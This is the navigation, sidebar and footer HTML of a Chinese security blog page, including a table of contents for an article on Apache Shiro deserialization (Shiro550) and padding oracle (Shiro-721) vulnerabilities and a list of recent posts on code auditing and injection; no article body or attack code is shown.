href="/2020/05/27/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8!Kerberoasting%E6%94%BB%E5%87%BB%E5%92%8CSPN%E6%9C%8D%E5%8A%A1/"><img class="next-cover" src="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231225559.webp" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">内网安全:Kerberoasting攻击和SPN服务</div></div></a></div></nav></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="is-center"><div class="avatar-img"><img src="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231013354.png" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info__name">Zeo</div><div class="author-info__description">专注于安全,分享生活,分享知识</div></div><div class="card-info-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">125</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">46</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">9</div></a></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/godzeo"><i class="fab fa-github"></i><span>Follow Me</span></a><div class="card-info-social-icons is-center"><a class="social-icon" href="https://github.com/godzeo" target="_blank" title="Github"><i class="fab fa-github"></i></a><a class="social-icon" href="mailto:zzzhhhaaaiiii@gmail.com" target="_blank" title="Email"><i class="fas fa-envelope"></i></a></div></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>公告</span></div><div class="announcement_content">Weclome my blog</div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Apache-Shiro-RememberMe-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%EF%BC%88Shiro550%EF%BC%89"><span class="toc-number">1.</span> <span class="toc-text">Apache Shiro RememberMe 反序列化（Shiro550）</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BD%B1%E5%93%8D%E7%BB%84%E4%BB%B6"><span class="toc-number">1.1.</span> <span class="toc-text">影响组件</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%9E%E9%99%85%E6%BC%8F%E6%B4%9E%E5%BD%B1%E5%93%8D%E8%8C%83%E5%9B%B4"><span class="toc-number">1.2.</span> <span class="toc-text">实际漏洞影响范围</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%9B%AE%E5%89%8D%E7%BD%91%E4%B8%8A%E6%94%B6%E9%9B%86%E5%88%B0%E7%9A%84%E5%AF%86%E9%92%A5"><span class="toc-number">1.3.</span> <span class="toc-text">目前网上收集到的密钥</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0"><span class="toc-number">1.4.</span> <span class="toc-text">漏洞复现</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Shiro550%E6%97%A0%E9%9C%80%E6%8F%90%E4%BE%9BrememberMe-Cookie"><span class="toc-number">1.4.1.</span> <span class="toc-text">Shiro550无需提供rememberMe Cookie</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Apache-Shiro-Padding-Oracle-Attack-Shiro-721"><span class="toc-number">2.</span> <span class="toc-text">Apache Shiro Padding Oracle Attack (Shiro-721)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BD%B1%E5%93%8D%E7%BB%84%E4%BB%B6-1"><span class="toc-number">2.1.</span> <span class="toc-text">影响组件</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-1"><span class="toc-number">2.2.</span> <span class="toc-text">漏洞复现</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E8%80%83"><span class="toc-number">2.3.</span> <span class="toc-text">参考</span></a></li></ol></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>最新文章</span></div><div class="aside-list"><div class="aside-list-item"><a class="thumbnail" href="/2022/11/28/Nosql%20inject%E6%B3%A8%E5%85%A5/" title="Nosql inject注入"><img src="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231217732.webp" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Nosql inject注入"/></a><div class="content"><a class="title" href="/2022/11/28/Nosql%20inject%E6%B3%A8%E5%85%A5/" title="Nosql inject注入">Nosql inject注入</a><time datetime="2022-11-28T07:28:02.000Z" title="发表于 2022-11-28 15:28:02">2022-11-28</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2022/11/15/%E4%BC%81%E4%B8%9A%20SDLC%20%E5%AE%89%E5%85%A8%E7%94%9F%E5%91%BD%E5%91%A8%E6%9C%9F%E7%AE%A1%E7%90%86/" title="企业 SDLC 安全生命周期管理"><img src="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231217732.webp" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="企业 SDLC 安全生命周期管理"/></a><div class="content"><a class="title" href="/2022/11/15/%E4%BC%81%E4%B8%9A%20SDLC%20%E5%AE%89%E5%85%A8%E7%94%9F%E5%91%BD%E5%91%A8%E6%9C%9F%E7%AE%A1%E7%90%86/" title="企业 SDLC 安全生命周期管理">企业 SDLC 安全生命周期管理</a><time datetime="2022-11-15T14:03:44.000Z" title="发表于 2022-11-15 22:03:44">2022-11-15</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2022/11/05/Go%20%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E6%BC%8F%E6%B4%9E(File%20Operation!Redirect!Cors)/" title="Go 代码审计漏洞(File Operation\Redirect\Cors)"><img src="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231225566.webp" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Go 代码审计漏洞(File Operation\Redirect\Cors)"/></a><div class="content"><a class="title" href="/2022/11/05/Go%20%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E6%BC%8F%E6%B4%9E(File%20Operation!Redirect!Cors)/" title="Go 代码审计漏洞(File Operation\Redirect\Cors)">Go 代码审计漏洞(File Operation\Redirect\Cors)</a><time datetime="2022-11-05T09:15:28.000Z" title="发表于 2022-11-05 17:15:28">2022-11-05</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2022/10/30/Go%20%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E9%AB%98%E5%8D%B1%E6%BC%8F%E6%B4%9E(sqli!cmd!ssrf)/" title="Go 代码审计高危漏洞(sqli\cmd\ssrf)"><img src="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231225566.webp" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Go 代码审计高危漏洞(sqli\cmd\ssrf)"/></a><div class="content"><a class="title" href="/2022/10/30/Go%20%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E9%AB%98%E5%8D%B1%E6%BC%8F%E6%B4%9E(sqli!cmd!ssrf)/" title="Go 代码审计高危漏洞(sqli\cmd\ssrf)">Go 代码审计高危漏洞(sqli\cmd\ssrf)</a><time datetime="2022-10-30T06:57:14.000Z" title="发表于 2022-10-30 14:57:14">2022-10-30</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2022/05/10/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%EF%BC%9A%20ClassLoader%E5%BA%94%E7%94%A8/" title="Java代码审计： ClassLoader应用"><img src="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231225566.webp" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Java代码审计： ClassLoader应用"/></a><div class="content"><a class="title" href="/2022/05/10/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%EF%BC%9A%20ClassLoader%E5%BA%94%E7%94%A8/" title="Java代码审计： ClassLoader应用">Java代码审计： ClassLoader应用</a><time datetime="2022-05-10T08:21:21.000Z" title="发表于 2022-05-10 16:21:21">2022-05-10</time></div></div></div></div></div></div></main><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;2019 - 2022 By Zeo</div><div class="footer_custom_text">Hi, welcome to my blog!</div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.umd.min.js"></script><div class="js-pjax"></div></div></body></html>